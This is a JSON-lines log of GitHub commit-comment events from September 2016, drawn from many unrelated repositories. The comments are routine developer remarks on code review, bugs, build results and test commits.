{"id":"4545602170","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18976697,"position":null,"line":null,"path":null,"commit_id":"9455e8bf3f38fb5df3a379e877ac2eb391cb98bf","created_at":"2016-09-11T10:24:20Z","updated_at":"2016-09-11T10:24:20Z","body":"SHUTDOWN only work when child process exit by **supervisor:terminate_child/2**\r\n\r\nSHUTDOWN don't apply when the gen_server crashes itself.\r\n\r\nhttp://stackoverflow.com/questions/39432798/why-the-supervisors-shutdown-brutal-kill-mechanism-not-working-as-document"}},"created_at":"2016-09-11T10:24:20Z"}
{"id":"4545604200","type":"CommitCommentEvent","actor":{"login":"arturoc"},"repo":{"name":"openframeworks/openFrameworks"},"payload":{"comment":{"id":18976698,"position":5,"line":0,"path":"libs/openFrameworks/app/ofAppGLFWWindow.cpp","commit_id":"e9dd408880f34ef4125b3d090c0401f5c5c754e7","created_at":"2016-09-11T10:26:07Z","updated_at":"2016-09-11T10:26:07Z","body":"no, it should be only enabled for more than 3 or if it's 3 then if the minor is more than one, we'll never have anything less than 3 so it should be fine"}},"created_at":"2016-09-11T10:26:07Z"}
{"id":"4545605292","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976700,"position":27,"line":49,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:27:04Z","updated_at":"2016-09-11T10:27:04Z","body":"Corrected to 'Each vessel has its own number of unique crew positions $m$ to fill out.' "}},"created_at":"2016-09-11T10:27:04Z"}
{"id":"4545605469","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976701,"position":34,"line":55,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:27:13Z","updated_at":"2016-09-11T10:27:13Z","body":"Agree"}},"created_at":"2016-09-11T10:27:13Z"}
{"id":"4545606563","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976703,"position":17,"line":405,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T10:28:10Z","updated_at":"2016-09-11T10:28:10Z","body":"I will check it"}},"created_at":"2016-09-11T10:28:10Z"}
{"id":"4545608078","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18976705,"position":null,"line":null,"path":null,"commit_id":"fb5a4379f784303b227858ec8c97aa82f6370c3b","created_at":"2016-09-11T10:29:32Z","updated_at":"2016-09-11T10:29:32Z","body":"```erlang\r\n===> Booted sasl\r\n===> Booted zoo\r\n1>supervisor:terminate_child(zoo_sup, fish_keeper).\r\n{18,28,27} [   fish_keeper] before terminate by shutdown\r\nok\r\n2>\r\n=SUPERVISOR REPORT==== 11-Sep-2016::18:28:28 ===\r\n     Supervisor: {local,zoo_sup}\r\n     Context:    shutdown_error\r\n     Reason:     killed\r\n     Offender:   [{pid,<0.86.0>},\r\n                  {id,fish_keeper},\r\n                  {mfargs,{zoo_keeper,start_link,[fish_keeper]}},\r\n                  {restart_type,permanent},\r\n                  {shutdown,1000},\r\n                  {child_type,worker}]\r\n```\r\n"}},"created_at":"2016-09-11T10:29:32Z"}
{"id":"4545608420","type":"CommitCommentEvent","actor":{"login":"cramzy1"},"repo":{"name":"staf621/ki4a"},"payload":{"comment":{"id":18976706,"position":null,"line":null,"path":null,"commit_id":"e6d28e474940320d1122b49d50bcd106c8632760","created_at":"2016-09-11T10:29:50Z","updated_at":"2016-09-11T10:29:50Z","body":"JavaScript's"}},"created_at":"2016-09-11T10:29:50Z"}
{"id":"4545608540","type":"CommitCommentEvent","actor":{"login":"equivalence1"},"repo":{"name":"ruby-debug/ruby-debug-ide"},"payload":{"comment":{"id":18976707,"position":5,"line":9,"path":"bin/gdb_wrapper","commit_id":"cede1279387a54c42002b5a5eb623173f29baaf8","created_at":"2016-09-11T10:29:58Z","updated_at":"2016-09-11T10:29:58Z","body":"@denofevil the problem is that I need to use this variables inside other functions (e.g. `choose_debugger` in case of `$options` and inside `NativeDebugger` class in case of other variables), so if I make them local I should pass it to the constructor of the class. I'm not quite sure if this a good way to handle it either. Do you think it's cleaner to do it this way?"}},"created_at":"2016-09-11T10:29:58Z"}
{"id":"4545609100","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976708,"position":5,"line":61,"path":"source/gameengine/Device/DEV_JoystickEvents.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T10:30:23Z","updated_at":"2016-09-11T10:30:23Z","body":"Using that syntax the function only allows array with the size pointing, other way it will allow any syze array. It can usr bools for addrem. I will change it"}},"created_at":"2016-09-11T10:30:23Z"}
{"id":"4545609822","type":"CommitCommentEvent","actor":{"login":"beatadelura"},"repo":{"name":"cezaryB/minimo"},"payload":{"comment":{"id":18976710,"position":33,"line":33,"path":"index.html","commit_id":"9912e7c67716b15cb4561c49046b88a8214fa6f2","created_at":"2016-09-11T10:31:00Z","updated_at":"2016-09-11T10:31:00Z","body":"Owiń też content strony w jakiś kontener i daj mu `max-width` bo teraz strona zajmuje całą szerokość przeglądarki. Na większych ekranach przeglądanie takiej strony jest męczące jeżeli content zajmuje całą szerokość. A max-width określ taki jaki jest na designie."}},"created_at":"2016-09-11T10:31:00Z"}
{"id":"4545610022","type":"CommitCommentEvent","actor":{"login":"zhongwencool"},"repo":{"name":"zhongwencool/erlang-rock"},"payload":{"comment":{"id":18976711,"position":null,"line":null,"path":null,"commit_id":"fb5a4379f784303b227858ec8c97aa82f6370c3b","created_at":"2016-09-11T10:31:10Z","updated_at":"2016-09-11T10:31:10Z","body":"Supervisor kill the fish_keeper when it find the terminate/2 run >1000ms."}},"created_at":"2016-09-11T10:31:10Z"}
{"id":"4545610767","type":"CommitCommentEvent","actor":{"login":"erikcas"},"repo":{"name":"CyanogenMod/android_build"},"payload":{"comment":{"id":18976712,"position":null,"line":null,"path":null,"commit_id":"c421ebc428245fb5da02806c977e04bae61f5029","created_at":"2016-09-11T10:31:48Z","updated_at":"2016-09-11T10:31:48Z","body":"OMG"}},"created_at":"2016-09-11T10:31:48Z"}
{"id":"4545610965","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18976713,"position":8,"line":403,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"85ddb546fbafca6d79967826ba50469d0ea01451","created_at":"2016-09-11T10:31:58Z","updated_at":"2016-09-11T10:31:58Z","body":"I dont understand you. Could you elaborate it?"}},"created_at":"2016-09-11T10:31:58Z"}
{"id":"4545611512","type":"CommitCommentEvent","actor":{"login":"beatadelura"},"repo":{"name":"cezaryB/minimo"},"payload":{"comment":{"id":18976714,"position":null,"line":null,"path":null,"commit_id":"9912e7c67716b15cb4561c49046b88a8214fa6f2","created_at":"2016-09-11T10:32:26Z","updated_at":"2016-09-11T10:32:26Z","body":"Poza tym wszystkim to świetnie sobie poradziłeś z zadaniem! Teraz zrób poprawki na osobnym branchu i stwórz na to pull requesta :)\r\n\r\n![bitmoji](https://render.bitstrips.com/v2/cpanel/8809958-154236510_4-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-11T10:32:26Z"}
{"id":"4545612633","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"lg-devs/android_device_lge_g5-common"},"payload":{"comment":{"id":18976715,"position":null,"line":null,"path":null,"commit_id":"ef69db7e3912c2d0874746217831ba27c4b90a95","created_at":"2016-09-11T10:33:21Z","updated_at":"2016-09-11T10:33:21Z","body":"Huh?\n\nOn Sun, Sep 11, 2016, 5:56 AM Erwan Leboucher <notifications@github.com>\nwrote:\n\n> op commit name\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lg-devs/android_device_lge_g5-common/commit/ef69db7e3912c2d0874746217831ba27c4b90a95#commitcomment-18976642>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB4TAC2UAEa6Em_5aKMw6h_gGE_p8aMKks5qo9BkgaJpZM4J5-L3>\n> .\n>\n-- \n\nThanks,\nRashed Abdel-Tawab\n"}},"created_at":"2016-09-11T10:33:21Z"}
{"id":"4545612908","type":"CommitCommentEvent","actor":{"login":"qhchen88g"},"repo":{"name":"qhchen88g/hello"},"payload":{"comment":{"id":18976716,"position":1,"line":1,"path":"README.md","commit_id":"8188e58a5ff62f055f5c3863e7c92fb754898c4d","created_at":"2016-09-11T10:33:38Z","updated_at":"2016-09-11T10:33:38Z","body":"test"}},"created_at":"2016-09-11T10:33:38Z"}
{"id":"4545614318","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976718,"position":43,"line":65,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:34:55Z","updated_at":"2016-09-11T10:34:55Z","body":"Agree"}},"created_at":"2016-09-11T10:34:55Z"}
{"id":"4545615393","type":"CommitCommentEvent","actor":{"login":"qhchen88g"},"repo":{"name":"qhchen88g/hello"},"payload":{"comment":{"id":18976719,"position":1,"line":1,"path":"README.md","commit_id":"8188e58a5ff62f055f5c3863e7c92fb754898c4d","created_at":"2016-09-11T10:35:47Z","updated_at":"2016-09-11T10:35:47Z","body":"123"}},"created_at":"2016-09-11T10:35:47Z"}
{"id":"4545617156","type":"CommitCommentEvent","actor":{"login":"underdoeg"},"repo":{"name":"openframeworks/openFrameworks"},"payload":{"comment":{"id":18976720,"position":5,"line":0,"path":"libs/openFrameworks/app/ofAppGLFWWindow.cpp","commit_id":"e9dd408880f34ef4125b3d090c0401f5c5c754e7","created_at":"2016-09-11T10:37:15Z","updated_at":"2016-09-11T10:37:15Z","body":"ok. never mind then :)"}},"created_at":"2016-09-11T10:37:15Z"}
{"id":"4545618670","type":"CommitCommentEvent","actor":{"login":"MidoriYakumo"},"repo":{"name":"toby20130333/dduiclock"},"payload":{"comment":{"id":18976721,"position":7,"line":6,"path":"README.md","commit_id":"9bc74fd5866bf4c6d6e36a33cb22d6cab11b5dd4","created_at":"2016-09-11T10:38:36Z","updated_at":"2016-09-11T10:38:36Z","body":"和我第一次写的时钟也有不少相同点呢哈哈 \r\n![](https://github.com/MidoriYakumo/OURSTM-MINI-demo_clock/raw/master/res/clock.gif)"}},"created_at":"2016-09-11T10:38:36Z"}
{"id":"4545619058","type":"CommitCommentEvent","actor":{"login":"larsommen"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976723,"position":14,"line":39,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:38:59Z","updated_at":"2016-09-11T10:38:59Z","body":"Agree to the first part - point of the last part \"..has its own subdomain of D; D_it\" is to state that D_it is actually a subdomain om D "}},"created_at":"2016-09-11T10:38:59Z"}
{"id":"4545620865","type":"CommitCommentEvent","actor":{"login":"genesixx"},"repo":{"name":"lg-devs/android_device_lge_g5-common"},"payload":{"comment":{"id":18976724,"position":null,"line":null,"path":null,"commit_id":"ef69db7e3912c2d0874746217831ba27c4b90a95","created_at":"2016-09-11T10:40:33Z","updated_at":"2016-09-11T10:40:33Z","body":"fron CAF N"}},"created_at":"2016-09-11T10:40:33Z"}
{"id":"4545621080","type":"CommitCommentEvent","actor":{"login":"AtXll"},"repo":{"name":"AtXll/git-test"},"payload":{"comment":{"id":18976725,"position":4,"line":7,"path":"recycle.txt","commit_id":"524d74394ac317d54e1e50ce36c54b9e3af6c068","created_at":"2016-09-11T10:40:46Z","updated_at":"2016-09-11T10:40:46Z","body":"# ****wer"}},"created_at":"2016-09-11T10:40:46Z"}
{"id":"4545621241","type":"CommitCommentEvent","actor":{"login":"AtXll"},"repo":{"name":"AtXll/git-test"},"payload":{"comment":{"id":18976726,"position":6,"line":7,"path":"recycle.txt","commit_id":"524d74394ac317d54e1e50ce36c54b9e3af6c068","created_at":"2016-09-11T10:40:52Z","updated_at":"2016-09-11T10:40:52Z","body":"wer"}},"created_at":"2016-09-11T10:40:52Z"}
{"id":"4545621331","type":"CommitCommentEvent","actor":{"login":"AtXll"},"repo":{"name":"AtXll/git-test"},"payload":{"comment":{"id":18976727,"position":7,"line":8,"path":"recycle.txt","commit_id":"524d74394ac317d54e1e50ce36c54b9e3af6c068","created_at":"2016-09-11T10:40:56Z","updated_at":"2016-09-11T10:40:56Z","body":"wer"}},"created_at":"2016-09-11T10:40:56Z"}
{"id":"4545621408","type":"CommitCommentEvent","actor":{"login":"AtXll"},"repo":{"name":"AtXll/git-test"},"payload":{"comment":{"id":18976728,"position":null,"line":null,"path":null,"commit_id":"524d74394ac317d54e1e50ce36c54b9e3af6c068","created_at":"2016-09-11T10:41:00Z","updated_at":"2016-09-11T10:41:00Z","body":"qwe"}},"created_at":"2016-09-11T10:41:00Z"}
{"id":"4545621634","type":"CommitCommentEvent","actor":{"login":"Rashed97"},"repo":{"name":"lg-devs/android_device_lge_g5-common"},"payload":{"comment":{"id":18976729,"position":null,"line":null,"path":null,"commit_id":"ef69db7e3912c2d0874746217831ba27c4b90a95","created_at":"2016-09-11T10:41:12Z","updated_at":"2016-09-11T10:41:12Z","body":"Oh. Derp. Whatever\n\nOn Sun, Sep 11, 2016, 6:40 AM Erwan Leboucher <notifications@github.com>\nwrote:\n\n> fron CAF N\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/lg-devs/android_device_lge_g5-common/commit/ef69db7e3912c2d0874746217831ba27c4b90a95#commitcomment-18976724>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB4TAHQFm77c6U804qv62WLaFC4bYL6Qks5qo9qigaJpZM4J5-L3>\n> .\n>\n-- \n\nThanks,\nRashed Abdel-Tawab\n"}},"created_at":"2016-09-11T10:41:12Z"}
{"id":"4545622394","type":"CommitCommentEvent","actor":{"login":"KcNirvana"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18976731,"position":null,"line":null,"path":null,"commit_id":"c534171d377561b35a3c015e2f46a46ba399fac3","created_at":"2016-09-11T10:41:51Z","updated_at":"2016-09-11T10:41:51Z","body":"Claro k sabes do k falas ve se no exemplo\r\nhttp://m.imgur.com/xd2ey46\r\nAbraço"}},"created_at":"2016-09-11T10:41:51Z"}
{"id":"4545626169","type":"CommitCommentEvent","actor":{"login":"OlegIlyenko"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18976733,"position":26,"line":40,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-11T10:45:14Z","updated_at":"2016-09-11T10:45:14Z","body":"Sure thing!"}},"created_at":"2016-09-11T10:45:14Z"}
{"id":"4545627332","type":"CommitCommentEvent","actor":{"login":"libiao0601"},"repo":{"name":"libiao0601/hello-world"},"payload":{"comment":{"id":18976736,"position":null,"line":null,"path":null,"commit_id":"f9651d566eb36c74c59ac38f581df0b8f469e431","created_at":"2016-09-11T10:46:14Z","updated_at":"2016-09-11T10:46:14Z","body":"hello world--1.2"}},"created_at":"2016-09-11T10:46:14Z"}
{"id":"4545627719","type":"CommitCommentEvent","actor":{"login":"larsommen"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976737,"position":27,"line":49,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T10:46:35Z","updated_at":"2016-09-11T10:46:35Z","body":"Agree"}},"created_at":"2016-09-11T10:46:35Z"}
{"id":"4545629396","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":18976738,"position":null,"line":null,"path":null,"commit_id":"a8e22ea5e051f07febc19aba859ca431909cc8d6","created_at":"2016-09-11T10:48:11Z","updated_at":"2016-09-11T10:48:11Z","body":"Now `dbg_mean_of(ei.pi->pawn_islands(Them));` returns\r\n\r\n- for rooks:\r\n> Total 9001113 Mean 2.06962\r\n\r\n- for queens:\r\n> Total 3563455 Mean 2.01266\r\n\r\nSo I'm going to scale down the bonus, re-check the logic, and then look for a proper way to tune this.\r\n\r\n"}},"created_at":"2016-09-11T10:48:11Z"}
{"id":"4545630043","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18976740,"position":5,"line":9,"path":"youtube_dl/extractor/foxnews.py","commit_id":"2cdbc06a1f9dfda4079b2529aa51089650715466","created_at":"2016-09-11T10:48:47Z","updated_at":"2016-09-11T10:48:47Z","body":"Renaming should be avoided when possible since it breaks download archives."}},"created_at":"2016-09-11T10:48:47Z"}
{"id":"4545632221","type":"CommitCommentEvent","actor":{"login":"OlegIlyenko"},"repo":{"name":"graphql/graphql.github.io"},"payload":{"comment":{"id":18976742,"position":33,"line":47,"path":"site/docs/BestPractice-ServingOverHTTP.md","commit_id":"a6f4e6c40bf2c7470a58a2ca20ac588208aadffd","created_at":"2016-09-11T10:50:48Z","updated_at":"2016-09-11T10:50:48Z","body":"I totally agree with you both. I'll make a PR for GraphiQL to improve this. "}},"created_at":"2016-09-11T10:50:48Z"}
{"id":"4545635469","type":"CommitCommentEvent","actor":{"login":"Wetxius"},"repo":{"name":"Shestak/ShestakUI"},"payload":{"comment":{"id":18976744,"position":null,"line":null,"path":null,"commit_id":"21903d5a8443bbd1e260d0cb093f336a4945cff7","created_at":"2016-09-11T10:53:47Z","updated_at":"2016-09-11T10:53:47Z","body":"Вернулся к варианту среднему, из нашего старого StatusBar, но применение длины полосы как в новом. Будет ли выход полосы за границу здоровья, не знаю. \r\nНо до комита багало определение размера, если переключаешься, например, с себя, на манекен, у которого 1 хп, и обратно. Итого, выход предсказа за границу экрана..."}},"created_at":"2016-09-11T10:53:47Z"}
{"id":"4545635965","type":"CommitCommentEvent","actor":{"login":"balamyt92"},"repo":{"name":"balamyt92/InfoDesk"},"payload":{"comment":{"id":18976745,"position":null,"line":null,"path":null,"commit_id":"6d9f475c02a60d7f74ccf4e3ddb0691d74953eec","created_at":"2016-09-11T10:54:19Z","updated_at":"2016-09-11T10:54:19Z","body":"#26 close"}},"created_at":"2016-09-11T10:54:19Z"}
{"id":"4545636377","type":"CommitCommentEvent","actor":{"login":"Thomas301263"},"repo":{"name":"ManuGithubSteam/LinJarK"},"payload":{"comment":{"id":18976749,"position":null,"line":null,"path":null,"commit_id":"21f9244272aec08aafc7612d7e04efb415f9637c","created_at":"2016-09-11T10:54:45Z","updated_at":"2016-09-11T10:54:45Z","body":"Hallo Manuel,\n\nwollte mal nachfragen wie weit Du mit Deinem Raspi gekommen bist.\n\nBei mir geht alles mit Raspi 2 + 3, Ubuntu Mate 16.04 und PHP 7. Jetzt \nkann ich alles was ich will steuern, nur die\n\nSprachauswertung von Simon könnte verbessert werden. Es passieren immer \nnoch Aktionen die durch Hintergrundgeräusche\n\nentstehen.\n\nGibt es denn zu Simon denn schon neue Erkenntnisse?\n\n\nGruß\n\nThomas\n\n\n\nAm 05.03.2016 um 13:24 schrieb Manuel:\n> Hallo Thomas,\n>\n> Also um das zusammen zu fassen:\n> Raspi 2 - langsamer aber ok\n> Raspi 3 schnell aber abstürze von Simon ?\n>\n> Ja das mit den Hintergrundgeräuschen ist ein Problem. Da gibt es nicht\n> viele Lösungen außer du trainierst auch mit Hintergrundgeräuschen, dann\n> fällt das nicht mehr so auf. Bei mir zb mein Rechnersummen, das wird dann\n> einfach als gegeben angesehen. Aber mit Variablem \n> Hintergrundgeräuschen ist\n> es da schon schwieriger...\n>\n> Es gibt ein Modul für Pulseaudio das die Soundausgane vom PC theoretisch\n> rausrechnet wenn man die wieder aufnimmt. Habe ich aber nicht so ganz zum\n> laufen bekommen denke bei mir lag das an der Leitungsverzerrung. Für \n> andere\n> Hintergrundgeräusche gibt es leider keine Lösung aber google usw \n> dürften da\n> auch Probleme haben.\n>\n> as Simon technisch geht, das du den Noise Level hoch setzt, dadurch wird\n> einfach mehr Rausgefiltert was unter einer Bestimmten Lautstärke ist, dann\n> musst du aber auch immer Lauter sprechen als der Level. Muss man eben gut\n> kalibrieren...\n>\n> Soweit von mir\n>\n> Manuel\n>\n> 2016-03-05 12:19 GMT+01:00 Thomas301263 <notifications@github.com>:\n>\n> > News\n> > Also Raspi 2 mit Ubuntu Mate 15.10.3 funktioniert zusammen mit Simon.\n> > Allerdings solltest Du bevor Du Simon installierst sphinxbase-utils und\n> > libqt4-sql-sqlite installieren.\n> > Danach alles wie gehabt. Raspi 2 ist zwar etwas langsam, aber er\n> > funktioniert mit Simon.\n> > Habe mir auch gleich nach Bekanntgabe das es Raspi 3 gibt einen \n> geordert.\n> > Der ist etwas schneller\n> > und damit funktioniert Simon gut und akzeptabel schnell. Auch das\n> > compilieren dauert nicht so lange.\n> > Das einzige Manko was Simon mit dem Raspi hat, ist das der Raspi nach\n> > Spracheingaben ab und an neu gestartet werden muss. Irgendwie kommt er\n> > irgendwo noch durcheinander.\n> > Mich versteht er schon gut und er macht auch alles so wie ich es \n> will, nur\n> > wenn es Hintergrunggeräusche gibt, dann kommt ab und zu was dabei \n> raus was\n> > man nicht möchte.\n> > Fällt Dir dazu etwas ein oder wie hast Du es gelöst, dass er nur auf\n> > Befehle hört?\n> > Gruß\n> > Thomas\n> >\n> > —\n> > Reply to this email directly or view it on GitHub\n> > \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517377>\n> > .\n> >\n>\n> —\n> Reply to this email directly or view it on GitHub \n> <https://github.com/ManuGithubSteam/LinJarK/commit/21f9244272aec08aafc7612d7e04efb415f9637c#commitcomment-16517620>.\n>\n\n"}},"created_at":"2016-09-11T10:54:45Z"}
{"id":"4545636565","type":"CommitCommentEvent","actor":{"login":"adrientetar"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18976750,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T10:54:55Z","updated_at":"2016-09-11T10:54:55Z","body":"@anthrotype does this change drop the setuptools>=18.0 requirement?"}},"created_at":"2016-09-11T10:54:55Z"}
{"id":"4545637380","type":"CommitCommentEvent","actor":{"login":"carnage"},"repo":{"name":"carnage/doctrine-encrypted-column"},"payload":{"comment":{"id":18976752,"position":17,"line":17,"path":"src/Configuration.php","commit_id":"e58734ae45f93f4b3c2831d5272b57febcd736d2","created_at":"2016-09-11T10:55:45Z","updated_at":"2016-09-11T10:55:45Z","body":"Nah, this was just for testing the doctrine bits worked properly. I've replaced it with a proper implementation in the latest commit."}},"created_at":"2016-09-11T10:55:45Z"}
{"id":"4545638896","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18976755,"position":5,"line":9,"path":"youtube_dl/extractor/foxnews.py","commit_id":"2cdbc06a1f9dfda4079b2529aa51089650715466","created_at":"2016-09-11T10:57:13Z","updated_at":"2016-09-11T10:57:13Z","body":"Thanks for reminding that. Fixed in fea74ac."}},"created_at":"2016-09-11T10:57:13Z"}
{"id":"4545639431","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18976756,"position":5,"line":9,"path":"youtube_dl/extractor/foxnews.py","commit_id":"2cdbc06a1f9dfda4079b2529aa51089650715466","created_at":"2016-09-11T10:57:44Z","updated_at":"2016-09-11T10:57:44Z","body":"Thanks."}},"created_at":"2016-09-11T10:57:44Z"}
{"id":"4545639757","type":"CommitCommentEvent","actor":{"login":"ximex"},"repo":{"name":"Admidio/admidio"},"payload":{"comment":{"id":18976757,"position":87,"line":113,"path":"adm_program/system/classes/tableroles.php","commit_id":"0fae7771155b2d0c70f2b00461fbf22ada14903b","created_at":"2016-09-11T10:58:03Z","updated_at":"2016-09-11T10:58:03Z","body":"@Fasse could you look at this both `return true`? This logic is in the code since the migration to github. i think the `return true` in L113 should be removed"}},"created_at":"2016-09-11T10:58:03Z"}
{"id":"4545639972","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":18976759,"position":5,"line":40,"path":"src/pocketmine/network/protocol/PlayerListPacket.php","commit_id":"9bb68f219c6caca0e9bc1414cc135e6b444b8aa8","created_at":"2016-09-11T10:58:15Z","updated_at":"2016-09-11T10:58:15Z","body":"actually not, i do some investogation, there seem to be more variants"}},"created_at":"2016-09-11T10:58:15Z"}
{"id":"4545640266","type":"CommitCommentEvent","actor":{"login":"nofearnohappy"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18976760,"position":null,"line":null,"path":null,"commit_id":"a41fa958d27ccfd05e34d2a0183c86c511f44ad9","created_at":"2016-09-11T10:58:33Z","updated_at":"2016-09-11T10:58:33Z","body":"gyro and magnetic sensors do not work"}},"created_at":"2016-09-11T10:58:33Z"}
{"id":"4545640558","type":"CommitCommentEvent","actor":{"login":"nofearnohappy"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18976761,"position":null,"line":null,"path":null,"commit_id":"a41fa958d27ccfd05e34d2a0183c86c511f44ad9","created_at":"2016-09-11T10:58:53Z","updated_at":"2016-09-11T10:58:53Z","body":"although they are connected to the core"}},"created_at":"2016-09-11T10:58:53Z"}
{"id":"4545640702","type":"CommitCommentEvent","actor":{"login":"BKSpurgeon"},"repo":{"name":"bnadlerjr/ruport"},"payload":{"comment":{"id":18976762,"position":null,"line":null,"path":null,"commit_id":"9fd92cd785e95bb8f04d182a34840467dd7aea96","created_at":"2016-09-11T10:59:03Z","updated_at":"2016-09-11T10:59:03Z","body":"has this been applied to the offical repo?"}},"created_at":"2016-09-11T10:59:03Z"}
{"id":"4545641918","type":"CommitCommentEvent","actor":{"login":"nofearnohappy"},"repo":{"name":"nofearnohappy/kernel_6.0_hermes"},"payload":{"comment":{"id":18976764,"position":null,"line":null,"path":null,"commit_id":"a41fa958d27ccfd05e34d2a0183c86c511f44ad9","created_at":"2016-09-11T11:00:10Z","updated_at":"2016-09-11T11:00:10Z","body":"problem in the firmware bin/bmi160 and yamaha537"}},"created_at":"2016-09-11T11:00:10Z"}
{"id":"4545642432","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18976765,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-11T11:00:28Z","updated_at":"2016-09-11T11:00:28Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.164](http://build.clear-measure.com/viewLog.html?buildId=10408&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-11T11:00:28Z"}
{"id":"4545644283","type":"CommitCommentEvent","actor":{"login":"KiLEdEnNis"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18976766,"position":110,"line":2254,"path":"data/wanderer missions.txt","commit_id":"a565ff8d8fb86d23e0790b42843167a5c8122afd","created_at":"2016-09-11T11:01:47Z","updated_at":"2016-09-11T11:01:47Z","body":"the \"come\" in \"come to pay their last respect\" after the sentence before it makes no sense to me either, unless I'm mistaken?\r\neven IF it is correct, if 50% of the players think it's wrong, it needs change"}},"created_at":"2016-09-11T11:01:47Z"}
{"id":"4545644546","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18976768,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-11T11:01:59Z","updated_at":"2016-09-11T11:01:59Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.164](http://build.clear-measure.com/viewLog.html?buildId=10408&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:31"}},"created_at":"2016-09-11T11:01:59Z"}
{"id":"4545646638","type":"CommitCommentEvent","actor":{"login":"nadako"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":18976770,"position":49,"line":274,"path":"src/generators/genlua.ml","commit_id":"b7e204924c76cd1240840092e132eadc29d34bcf","created_at":"2016-09-11T11:03:45Z","updated_at":"2016-09-11T11:03:45Z","body":"Isn't it the same as just returning `e`? :)"}},"created_at":"2016-09-11T11:03:45Z"}
{"id":"4545646918","type":"CommitCommentEvent","actor":{"login":"arangholm"},"repo":{"name":"larsommen/deap_sea_crew_scheduling"},"payload":{"comment":{"id":18976771,"position":52,"line":90,"path":"mathematicalModuling/MathematicalModel.tex","commit_id":"5724027af31fd089595d035b35b84ae849155cdb","created_at":"2016-09-11T11:04:03Z","updated_at":"2016-09-11T11:04:03Z","body":"Agree"}},"created_at":"2016-09-11T11:04:03Z"}
